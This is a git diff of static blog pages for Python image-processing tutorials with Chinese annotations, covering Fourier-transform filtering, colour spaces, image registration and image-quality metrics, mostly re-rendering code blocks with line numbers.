        ax2 = fig.add_subplot(2,2,2)
        ax2.imshow(magnitude_spectrum)
        ax2.title.set_text('FFT of image')
        plt.show()

        png

        右边图中,每一个点

        1)它到中点的距离描述的是频率

        2)中点到它的方向,是平面波的方向

        3)那一点的灰度值描述的是它的幅值

        -
        img = cv2.imread('images/sandstone.tif', 0) # load an image
        dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
        dft_shift = np.fft.fftshift(dft)
        magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)

        fig = plt.figure(figsize=(12, 12))
        ax1 = fig.add_subplot(2,2,1)
        ax1.imshow(img)
        ax1.title.set_text('Input Image')
        ax2 = fig.add_subplot(2,2,2)
        ax2.imshow(magnitude_spectrum)
        ax2.title.set_text('FFT of image')
        plt.show()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        img = cv2.imread('images/sandstone.tif', 0) # load an image
        dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
        dft_shift = np.fft.fftshift(dft)
        magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)

        fig = plt.figure(figsize=(12, 12))
        ax1 = fig.add_subplot(2,2,1)
        ax1.imshow(img)
        ax1.title.set_text('Input Image')
        ax2 = fig.add_subplot(2,2,2)
        ax2.imshow(magnitude_spectrum)
        ax2.title.set_text('FFT of image')
        plt.show()

        png

        Tutorial 41 - Image filtering using Fourier transform in python

        -
        import cv2
        from matplotlib import pyplot as plt
        import numpy as np

        img = cv2.imread('images/sandstone.tif', 0) # load an image
        +
        1
        2
        3
        4
        5
        import cv2
        from matplotlib import pyplot as plt
        import numpy as np

        img = cv2.imread('images/sandstone.tif', 0) # load an image
        • Output is a 2D complex array. 1st channel real and 2nd imaginary
            @@ -755,7 +753,7 @@

          -
          dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
          +
          1
          dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
          • Rearranges a Fourier transform X by shifting the zero-frequency component to the center of the array.
              @@ -768,7 +766,7 @@

            -
            dft_shift = np.fft.fftshift(dft)
            +
            1
            dft_shift = np.fft.fftshift(dft)
            • Magnitude of the function is 20.log(abs(f))
                @@ -786,7 +784,7 @@

              -
              magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))
              +
              1
              magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))
              • 使用傅里叶变换进行边缘检测

                @@ -816,7 +814,7 @@

              -
              rows, cols = img.shape
              crow, ccol = int(rows / 2), int(cols / 2)

              mask = np.ones((rows, cols, 2), np.uint8)
              r = 80
              center = [crow, ccol]
              x, y = np.ogrid[:rows, :cols]
              mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
              mask[mask_area] = 0
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              rows, cols = img.shape
              crow, ccol = int(rows / 2), int(cols / 2)

              mask = np.ones((rows, cols, 2), np.uint8)
              r = 80
              center = [crow, ccol]
              x, y = np.ogrid[:rows, :cols]
              mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
              mask[mask_area] = 0
              • apply mask and inverse DFT: Multiply fourier transformed image (values) with the mask values.
                  @@ -824,7 +822,7 @@

                -
                fshift = dft_shift * mask
                +
                1
                fshift = dft_shift * mask
                • Get the magnitude spectrum (only for plotting purposes)
                    @@ -832,7 +830,7 @@

                  -
                  fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                  +
                  1
                  fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                  C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\199016683.py:1: RuntimeWarning: divide by zero encountered in log
                     fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                   
                  @@ -843,7 +841,7 @@

                -
                f_ishift = np.fft.ifftshift(fshift)
                +
                1
                f_ishift = np.fft.ifftshift(fshift)
                • Inverse DFT to convert back to image domain from the frequency domain.
                    @@ -856,7 +854,7 @@

                  -
                  img_back = cv2.idft(f_ishift)
                  +
                  1
                  img_back = cv2.idft(f_ishift)
                  • Magnitude spectrum of the image domain
                      @@ -864,11 +862,11 @@

                    -
                    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
                    +
                    1
                    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
                    • 绘图
                    -
                    fig = plt.figure(figsize=(12, 12))
                    ax1 = fig.add_subplot(2,2,1)
                    ax1.imshow(img, cmap='gray')
                    ax1.title.set_text('Input Image')
                    ax2 = fig.add_subplot(2,2,2)
                    ax2.imshow(magnitude_spectrum, cmap='gray')
                    ax2.title.set_text('FFT of image')
                    ax3 = fig.add_subplot(2,2,3)
                    ax3.imshow(fshift_mask_mag, cmap='gray')
                    ax3.title.set_text('FFT + Mask')
                    ax4 = fig.add_subplot(2,2,4)
                    ax4.imshow(img_back, cmap='gray')
                    ax4.title.set_text('After inverse FFT')
                    plt.show()
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    fig = plt.figure(figsize=(12, 12))
                    ax1 = fig.add_subplot(2,2,1)
                    ax1.imshow(img, cmap='gray')
                    ax1.title.set_text('Input Image')
                    ax2 = fig.add_subplot(2,2,2)
                    ax2.imshow(magnitude_spectrum, cmap='gray')
                    ax2.title.set_text('FFT of image')
                    ax3 = fig.add_subplot(2,2,3)
                    ax3.imshow(fshift_mask_mag, cmap='gray')
                    ax3.title.set_text('FFT + Mask')
                    ax4 = fig.add_subplot(2,2,4)
                    ax4.imshow(img_back, cmap='gray')
                    ax4.title.set_text('After inverse FFT')
                    plt.show()

                    png

                    • Circular LPF mask, center circle is 1, remaining all zeros @@ -887,8 +885,8 @@

                    -
                    rows, cols = img.shape
                    crow, ccol = int(rows / 2), int(cols / 2)

                    mask = np.zeros((rows, cols, 2), np.uint8)
                    r = 100
                    center = [crow, ccol]
                    x, y = np.ogrid[:rows, :cols]
                    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
                    mask[mask_area] = 1

                    # Band Pass Filter - Concentric circle mask, only the points living in concentric circle are ones
                    rows, cols = img.shape
                    crow, ccol = int(rows / 2), int(cols / 2)

                    mask = np.zeros((rows, cols, 2), np.uint8)
                    r_out = 80
                    r_in = 10
                    center = [crow, ccol]
                    x, y = np.ogrid[:rows, :cols]
                    mask_area = np.logical_and(((x - center[0]) ** 2 + (y - center[1]) ** 2 >= r_in ** 2),
                    ((x - center[0]) ** 2 + (y - center[1]) ** 2 <= r_out ** 2))
                    mask[mask_area] = 1
                    -
                    fshift = dft_shift * mask
                    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                    f_ishift = np.fft.ifftshift(fshift)
                    img_back = cv2.idft(f_ishift)
                    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
                    fig = plt.figure(figsize=(12, 12))
                    ax1 = fig.add_subplot(2,2,1)
                    ax1.imshow(img, cmap='gray')
                    ax1.title.set_text('Input Image')
                    ax2 = fig.add_subplot(2,2,2)
                    ax2.imshow(magnitude_spectrum, cmap='gray')
                    ax2.title.set_text('FFT of image')
                    ax3 = fig.add_subplot(2,2,3)
                    ax3.imshow(fshift_mask_mag, cmap='gray')
                    ax3.title.set_text('FFT + Mask')
                    ax4 = fig.add_subplot(2,2,4)
                    ax4.imshow(img_back, cmap='gray')
                    ax4.title.set_text('After inverse FFT')
                    plt.show()
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    20
                    21
                    22
                    rows, cols = img.shape
                    crow, ccol = int(rows / 2), int(cols / 2)

                    mask = np.zeros((rows, cols, 2), np.uint8)
                    r = 100
                    center = [crow, ccol]
                    x, y = np.ogrid[:rows, :cols]
                    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
                    mask[mask_area] = 1

                    # Band Pass Filter - Concentric circle mask, only the points living in concentric circle are ones
                    rows, cols = img.shape
                    crow, ccol = int(rows / 2), int(cols / 2)

                    mask = np.zeros((rows, cols, 2), np.uint8)
                    r_out = 80
                    r_in = 10
                    center = [crow, ccol]
                    x, y = np.ogrid[:rows, :cols]
                    mask_area = np.logical_and(((x - center[0]) ** 2 + (y - center[1]) ** 2 >= r_in ** 2),
                    ((x - center[0]) ** 2 + (y - center[1]) ** 2 <= r_out ** 2))
                    mask[mask_area] = 1
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    fshift = dft_shift * mask
                    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                    f_ishift = np.fft.ifftshift(fshift)
                    img_back = cv2.idft(f_ishift)
                    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
                    fig = plt.figure(figsize=(12, 12))
                    ax1 = fig.add_subplot(2,2,1)
                    ax1.imshow(img, cmap='gray')
                    ax1.title.set_text('Input Image')
                    ax2 = fig.add_subplot(2,2,2)
                    ax2.imshow(magnitude_spectrum, cmap='gray')
                    ax2.title.set_text('FFT of image')
                    ax3 = fig.add_subplot(2,2,3)
                    ax3.imshow(fshift_mask_mag, cmap='gray')
                    ax3.title.set_text('FFT + Mask')
                    ax4 = fig.add_subplot(2,2,4)
                    ax4.imshow(img_back, cmap='gray')
                    ax4.title.set_text('After inverse FFT')
                    plt.show()
                    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\2728092902.py:2: RuntimeWarning: divide by zero encountered in log
                       fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                     
                    @@ -4925,6 +4923,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Introductory python tutorials for image processing(42-43)-CLAHE/index.html b/posts/DIP-Introductory python tutorials for image processing(42-43)-CLAHE/index.html index 1f6e741795..7a350dfe22 100644 --- a/posts/DIP-Introductory python tutorials for image processing(42-43)-CLAHE/index.html +++ b/posts/DIP-Introductory python tutorials for image processing(42-43)-CLAHE/index.html @@ -44,8 +44,6 @@ - - @@ -403,7 +401,7 @@

                    DIP-Introductory python tutorials for image processing(42-43)-CLAHE

                    @@ -4693,6 +4691,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Introductory python tutorials for image processing(44-45)-Color Spaces/index.html b/posts/DIP-Introductory python tutorials for image processing(44-45)-Color Spaces/index.html index f35b5e6db8..4fd2693b7c 100644 --- a/posts/DIP-Introductory python tutorials for image processing(44-45)-Color Spaces/index.html +++ b/posts/DIP-Introductory python tutorials for image processing(44-45)-Color Spaces/index.html @@ -44,8 +44,6 @@ - - @@ -406,12 +404,12 @@

                    Color spaces

                    Color spaces are a way to represent color information present in an image.

                    3 popular color spaces are RGB, HSV and LAB.

                    -
                    import cv2
                    from skimage import io
                    import matplotlib.pyplot as plt

                    color_opencv = cv2.imread('images/Osteosarcoma_01.tif', 1)
                    gray_opencv = cv2.imread('images/Osteosarcoma_01.tif', 0)

                    color_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
                    gray_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=True)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    import cv2
                    from skimage import io
                    import matplotlib.pyplot as plt

                    color_opencv = cv2.imread('images/Osteosarcoma_01.tif', 1)
                    gray_opencv = cv2.imread('images/Osteosarcoma_01.tif', 0)

                    color_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
                    gray_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=True)

                    RGB Color space

                    Stores information as Red, Green and Blue channels.

                    Additive color model.

                    Both scikit-image and opencv read color images by default as RGB but, opencv stored color infromation as BGR.

                    -
                    B, G, R = cv2.split(color_opencv)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(B, cmap='gray')
                    ax2.title.set_text('B')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(G, cmap='gray')
                    ax3.title.set_text('G')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(R, cmap='gray')
                    ax4.title.set_text('R')
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    B, G, R = cv2.split(color_opencv)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(B, cmap='gray')
                    ax2.title.set_text('B')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(G, cmap='gray')
                    ax3.title.set_text('G')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(R, cmap='gray')
                    ax4.title.set_text('R')

                    png

                    HSV

                    HSV stores color image information as Hue, Saturation and Value.

                    @@ -421,7 +419,7 @@

                    HSV

                    For applications where you need to change only pixel intensites and not color information.

                    适用于只需要更改像素强度而不需要更改颜色信息的应用程序。

                    e.g. histogram equalization 直方图均衡化

                    -
                    hsv_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2HSV)
                    H, S, V = cv2.split(hsv_image)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(H, cmap='gray')
                    ax2.title.set_text('H')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(S, cmap='gray')
                    ax3.title.set_text('S')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(V, cmap='gray')
                    ax4.title.set_text('V')
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    20
                    hsv_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2HSV)
                    H, S, V = cv2.split(hsv_image)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(H, cmap='gray')
                    ax2.title.set_text('H')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(S, cmap='gray')
                    ax3.title.set_text('S')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(V, cmap='gray')
                    ax4.title.set_text('V')

                    png

                    LAB

                    LAB expresses color as three values:

                    @@ -442,15 +440,15 @@

                    LAB

                    e.g. histogram equalization

                    Either HSV or LAB can be used interchangeably for most image processing tasks.

                    对于大多数图像处理任务,HSV 或 LAB 都可以互换使用。

                    -
                    lab_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2LAB)
                    L, A, B = cv2.split(lab_image)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(L, cmap='gray')
                    ax2.title.set_text('L')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(A, cmap='gray')
                    ax3.title.set_text('A')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(B, cmap='gray')
                    ax4.title.set_text('B')
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    20
                    lab_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2LAB)
                    L, A, B = cv2.split(lab_image)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(L, cmap='gray')
                    ax2.title.set_text('L')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(A, cmap='gray')
                    ax3.title.set_text('A')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(B, cmap='gray')
                    ax4.title.set_text('B')

                    png

                    Tutorial 45 - Applying filters designed for grey scale to color images in python

                    -
                    from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
                    from skimage import filters
                    from skimage import io
                    from matplotlib import pyplot as plt
                    from skimage.color import rgb2gray
                    +
                    1
                    2
                    3
                    4
                    5
                    from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
                    from skimage import filters
                    from skimage import io
                    from matplotlib import pyplot as plt
                    from skimage.color import rgb2gray
                    • Fails on color images as it is a grey filter
                    • May work with newest skimage, but not clear what is does.
                    -
                    image = io.imread('images/monalisa.jpg')
                    try_to_apply_sobel = filters.sobel(image)
                    plt.imshow(try_to_apply_sobel)
                    +
                    1
                    2
                    3
                    image = io.imread('images/monalisa.jpg')
                    try_to_apply_sobel = filters.sobel(image)
                    plt.imshow(try_to_apply_sobel)
                    <matplotlib.image.AxesImage at 0x2c0eaaeab50>
                     

                    png

                    @@ -473,24 +471,24 @@

                    @adapt_rgb(each_channel)  # 修饰器
                    def sobel_each(image):
                    return filters.sobel(image)


                    @adapt_rgb(hsv_value)
                    def sobel_hsv(image):
                    return filters.sobel(image)
                    -
                    each_channel_image = sobel_each(image)
                    hsv_value_image = sobel_hsv(image)
                    plt.imshow(hsv_value_image)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    @adapt_rgb(each_channel)  # 修饰器
                    def sobel_each(image):
                    return filters.sobel(image)


                    @adapt_rgb(hsv_value)
                    def sobel_hsv(image):
                    return filters.sobel(image)
                    +
                    1
                    2
                    3
                    each_channel_image = sobel_each(image)
                    hsv_value_image = sobel_hsv(image)
                    plt.imshow(hsv_value_image)
                    <matplotlib.image.AxesImage at 0x2c0eab5cb50>
                     

                    png

                    -
                    import cv2


                    @adapt_rgb(each_channel)
                    def median_each(image, k):
                    output_image = cv2.medianBlur(image, k)
                    return output_image

                    median_using_cv2 = median_each(image, 13)
                    plt.imshow(median_using_cv2)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    import cv2


                    @adapt_rgb(each_channel)
                    def median_each(image, k):
                    output_image = cv2.medianBlur(image, k)
                    return output_image

                    median_using_cv2 = median_each(image, 13)
                    plt.imshow(median_using_cv2)
                    <matplotlib.image.AxesImage at 0x2c0eb86fbb0>
                     

                    png

                    -
                    from skimage import exposure


                    @adapt_rgb(each_channel)
                    def eq_each(image):
                    output_image = exposure.equalize_hist(image)
                    return (output_image)

                    equ_RGB = eq_each(image)
                    plt.imshow(equ_RGB)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    from skimage import exposure


                    @adapt_rgb(each_channel)
                    def eq_each(image):
                    output_image = exposure.equalize_hist(image)
                    return (output_image)

                    equ_RGB = eq_each(image)
                    plt.imshow(equ_RGB)
                    <matplotlib.image.AxesImage at 0x2c0ec1ef3d0>
                     

                    png

                    -
                    @adapt_rgb(hsv_value)
                    def eq_hsv(image):
                    output_image = exposure.equalize_hist(image)
                    return (output_image)

                    equ_hsv = eq_hsv(image)
                    plt.imshow(equ_hsv)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    @adapt_rgb(hsv_value)
                    def eq_hsv(image):
                    output_image = exposure.equalize_hist(image)
                    return (output_image)

                    equ_hsv = eq_hsv(image)
                    plt.imshow(equ_hsv)
                    <matplotlib.image.AxesImage at 0x2c0ed2423a0>
                     

                    png

                    -
                    fig = plt.figure(figsize=(10, 10))

                    ax1 = fig.add_subplot(2,2,1)
                    ax1.imshow(image)
                    ax1.title.set_text('Input Image')

                    ax2 = fig.add_subplot(2,2,2)
                    ax2.imshow(equ_RGB)
                    ax2.title.set_text('Equalized using RGB channels')

                    ax3 = fig.add_subplot(2,2,3)
                    ax3.imshow(equ_hsv)
                    ax3.title.set_text('Equalized using v channel in hsv')

                    plt.show()
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    fig = plt.figure(figsize=(10, 10))

                    ax1 = fig.add_subplot(2,2,1)
                    ax1.imshow(image)
                    ax1.title.set_text('Input Image')

                    ax2 = fig.add_subplot(2,2,2)
                    ax2.imshow(equ_RGB)
                    ax2.title.set_text('Equalized using RGB channels')

                    ax3 = fig.add_subplot(2,2,3)
                    ax3.imshow(equ_hsv)
                    ax3.title.set_text('Equalized using v channel in hsv')

                    plt.show()

                    png

                    @@ -4524,6 +4522,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Introductory python tutorials for image processing(46-47)-Image Registration/index.html b/posts/DIP-Introductory python tutorials for image processing(46-47)-Image Registration/index.html index 21823956a2..52ead09fc3 100644 --- a/posts/DIP-Introductory python tutorials for image processing(46-47)-Image Registration/index.html +++ b/posts/DIP-Introductory python tutorials for image processing(46-47)-Image Registration/index.html @@ -44,8 +44,6 @@ - - @@ -532,7 +530,7 @@

                    from skimage import io
                    from image_registration import chi2_shift

                    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
                    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
                    +
                    1
                    2
                    3
                    4
                    5
                    from skimage import io
                    from image_registration import chi2_shift

                    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
                    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
                    • Method 1: chi squared shift
                        @@ -544,7 +542,7 @@

                        noise=0.1
                        xoff, yoff, exoff, eyoff = chi2_shift(image, offset_image, noise,
                        return_error=True, upsample_factor='auto')

                        print("Offset image was translated by: 18, -17")
                        print("Pixels shifted by: ", xoff, yoff)

                        from scipy.ndimage import shift
                        corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

                        from matplotlib import pyplot as plt
                        fig = plt.figure(figsize=(10, 10))
                        ax1 = fig.add_subplot(2,2,1)
                        ax1.imshow(image, cmap='gray')
                        ax1.title.set_text('Input Image')
                        ax2 = fig.add_subplot(2,2,2)
                        ax2.imshow(offset_image, cmap='gray')
                        ax2.title.set_text('Offset image')
                        ax3 = fig.add_subplot(2,2,3)
                        ax3.imshow(corrected_image, cmap='gray')
                        ax3.title.set_text('Corrected')
                        plt.show()
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        noise=0.1
                        xoff, yoff, exoff, eyoff = chi2_shift(image, offset_image, noise,
                        return_error=True, upsample_factor='auto')

                        print("Offset image was translated by: 18, -17")
                        print("Pixels shifted by: ", xoff, yoff)

                        from scipy.ndimage import shift
                        corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

                        from matplotlib import pyplot as plt
                        fig = plt.figure(figsize=(10, 10))
                        ax1 = fig.add_subplot(2,2,1)
                        ax1.imshow(image, cmap='gray')
                        ax1.title.set_text('Input Image')
                        ax2 = fig.add_subplot(2,2,2)
                        ax2.imshow(offset_image, cmap='gray')
                        ax2.title.set_text('Offset image')
                        ax3 = fig.add_subplot(2,2,3)
                        ax3.imshow(corrected_image, cmap='gray')
                        ax3.title.set_text('Corrected')
                        plt.show()
                        Offset image was translated by: 18, -17
                         Pixels shifted by:  18.001953125 -16.990234375
                         
                        @@ -560,7 +558,7 @@

                        from skimage import io
                        from image_registration import cross_correlation_shifts

                        image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
                        offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
                        # offset image translated by (-17, 18) in y and x


                        xoff, yoff = cross_correlation_shifts(image, offset_image)


                        print("Offset image was translated by: 18, -17")
                        print("Pixels shifted by: ", xoff, yoff)


                        from scipy.ndimage import shift
                        corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

                        from matplotlib import pyplot as plt
                        fig = plt.figure(figsize=(10, 10))
                        ax1 = fig.add_subplot(2,2,1)
                        ax1.imshow(image, cmap='gray')
                        ax1.title.set_text('Input Image')
                        ax2 = fig.add_subplot(2,2,2)
                        ax2.imshow(offset_image, cmap='gray')
                        ax2.title.set_text('Offset image')
                        ax3 = fig.add_subplot(2,2,3)
                        ax3.imshow(corrected_image, cmap='gray')
                        ax3.title.set_text('Corrected')
                        plt.show()
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        from skimage import io
                        from image_registration import cross_correlation_shifts

                        image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
                        offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
                        # offset image translated by (-17, 18) in y and x


                        xoff, yoff = cross_correlation_shifts(image, offset_image)


                        print("Offset image was translated by: 18, -17")
                        print("Pixels shifted by: ", xoff, yoff)


                        from scipy.ndimage import shift
                        corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

                        from matplotlib import pyplot as plt
                        fig = plt.figure(figsize=(10, 10))
                        ax1 = fig.add_subplot(2,2,1)
                        ax1.imshow(image, cmap='gray')
                        ax1.title.set_text('Input Image')
                        ax2 = fig.add_subplot(2,2,2)
                        ax2.imshow(offset_image, cmap='gray')
                        ax2.title.set_text('Offset image')
                        ax3 = fig.add_subplot(2,2,3)
                        ax3.imshow(corrected_image, cmap='gray')
                        ax3.title.set_text('Corrected')
                        plt.show()
                        Offset image was translated by: 18, -17
                         Pixels shifted by:  18.00140750783571 -16.988641048024164
                         
                        @@ -4647,6 +4645,8 @@

                        目录

                        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Introductory python tutorials for image processing(48-50)-Image Quality/index.html b/posts/DIP-Introductory python tutorials for image processing(48-50)-Image Quality/index.html index 3e506da408..1fcbff7839 100644 --- a/posts/DIP-Introductory python tutorials for image processing(48-50)-Image Quality/index.html +++ b/posts/DIP-Introductory python tutorials for image processing(48-50)-Image Quality/index.html @@ -44,8 +44,6 @@ - - @@ -418,17 +416,17 @@

                        SSI: Takes texture into account.

                      -
                      import cv2
                      import numpy as np
                      from sewar import full_ref
                      from skimage import metrics

                      ref_img = cv2.imread("images/sandstone.tif", 1)
                      img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
                      -
                      mse_skimg = metrics.mean_squared_error(ref_img, img)
                      print("MSE: based on scikit-image = ", mse_skimg)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      import cv2
                      import numpy as np
                      from sewar import full_ref
                      from skimage import metrics

                      ref_img = cv2.imread("images/sandstone.tif", 1)
                      img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
                      +
                      1
                      2
                      mse_skimg = metrics.mean_squared_error(ref_img, img)
                      print("MSE: based on scikit-image = ", mse_skimg)
                      MSE: based on scikit-image =  170.83926291047953
                       
                      -
                      psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
                      print("PSNR: based on scikit-image = ", psnr_skimg)
                      +
                      1
                      2
                      psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
                      print("PSNR: based on scikit-image = ", psnr_skimg)
                      PSNR: based on scikit-image =  25.80492671881574
                       
                      -
                      rmse_skimg = metrics.normalized_root_mse(ref_img, img)
                      print("RMSE: based on scikit-image = ", rmse_skimg)
                      +
                      1
                      2
                      rmse_skimg = metrics.normalized_root_mse(ref_img, img)
                      print("RMSE: based on scikit-image = ", rmse_skimg)
                      RMSE: based on scikit-image =  0.10647019507436659
                       
                      -
                      from skimage.metrics import structural_similarity as ssim
                      ssim_skimg = ssim(ref_img, img,
                      data_range = img.max() - img.min(),
                      multichannel = True)
                      print("SSIM: based on scikit-image = ", ssim_skimg)
                      +
                      1
                      2
                      3
                      4
                      5
                      from skimage.metrics import structural_similarity as ssim
                      ssim_skimg = ssim(ref_img, img,
                      data_range = img.max() - img.min(),
                      multichannel = True)
                      print("SSIM: based on scikit-image = ", ssim_skimg)
                      SSIM: based on scikit-image =  0.6631528566884437
                       
                       
                      @@ -436,8 +434,8 @@ 

                      如果两幅图片完全相同:

                      -
                      img = ref_img
                      -
                      mse_skimg = metrics.mean_squared_error(ref_img, img)
                      print("MSE: based on scikit-image = ", mse_skimg)
                      psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
                      print("PSNR: based on scikit-image = ", psnr_skimg)
                      rmse_skimg = metrics.normalized_root_mse(ref_img, img)
                      print("RMSE: based on scikit-image = ", rmse_skimg)
                      from skimage.metrics import structural_similarity as ssim
                      ssim_skimg = ssim(ref_img, img,
                      data_range = img.max() - img.min(),
                      multichannel = True)
                      print("SSIM: based on scikit-image = ", ssim_skimg)
                      +
                      1
                      img = ref_img
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      mse_skimg = metrics.mean_squared_error(ref_img, img)
